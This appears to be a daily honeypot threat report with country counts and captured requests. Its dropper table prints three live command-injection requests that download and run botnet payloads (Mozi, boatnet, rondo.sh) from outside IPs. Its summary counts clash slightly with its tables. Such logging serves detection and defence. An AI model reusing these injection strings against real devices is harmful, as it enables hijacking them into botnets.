Report: 2025-06-24

Report Daily
Author
Shoggoth Industries

Daily Report: 2025-06-24

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 14 new requests that have never been observed before (these were added to the monitored request database).

A total of 700 requests were recorded during the day, originating from 3 different countries, with a peak of 289 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 144.172.97.104 | `POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.32%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1` |
| 122.97.212.38 | `GET /shell?cd+/tmp;rm+-rf+*;wget+http://102.33.47.108:41507/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1` |
| 45.135.194.34 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1` |

request

The requests listed here are those that have not yet been integrated into the request database.

| | number_of_occurence | request |
| --- | --- | --- |
| 82 | 1 | `\x00\x0E8x\x13\x0F\xBF\xEF\xD1X~\x00\x00\x00\x00\x00` |
| 90 | 1 | `GET /cgi-bin/sms_send?username=user1&password=user1&number=003584573994612&text=test HTTP/1.1` |
| 99 | 1 | `GET /cgi-bin/sms_send?username=user1&password=user_pass&number=003584573994612&text=test HTTP/1.1` |
| 100 | 1 | `GET /cgi-bin/sms_send?username=user1&password=p8xr6tINNA0eGBIY&number=003584573994612&text=test HTTP/1.1` |

country_iso_code

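| | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 289 | US |
| 1 | 64 | CN |
| 2 | 46 | BG |
| 3 | 45 | DE |
| 4 | 45 | NL |
| 5 | 24 | JP |
| 6 | 21 | IN |
| 7 | 18 | CA |
| 8 | 18 | SG |
| 9 | 18 | GB |
| 10 | 16 | ID |
| 11 | 9 | LT |
| 12 | 7 | RU |
| 13 | 7 | BR |
| 14 | 6 | PL |
| 15 | 6 | CH |
| 16 | 6 | ZA |
| 17 | 6 | IL |
| 18 | 6 | PT |
| 19 | 5 | SC |
| 20 | 4 | BE |
| 21 | 4 | AO |
| 22 | 4 | UA |
| 23 | 3 | FR |
| 24 | 3 | KZ |
| 25 | 3 | AU |
| 26 | 2 | MD |
| 27 | 2 | KR |
| 28 | 2 | HK |
| 29 | 2 | KW |
| 30 | 2 | SE |
| 31 | 2 | IE |
| 32 | 1 | MC |
| 33 | 1 | ES |
| 34 | 1 | KH |
| 35 | 1 | VE |
| 36 | 1 | AZ |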
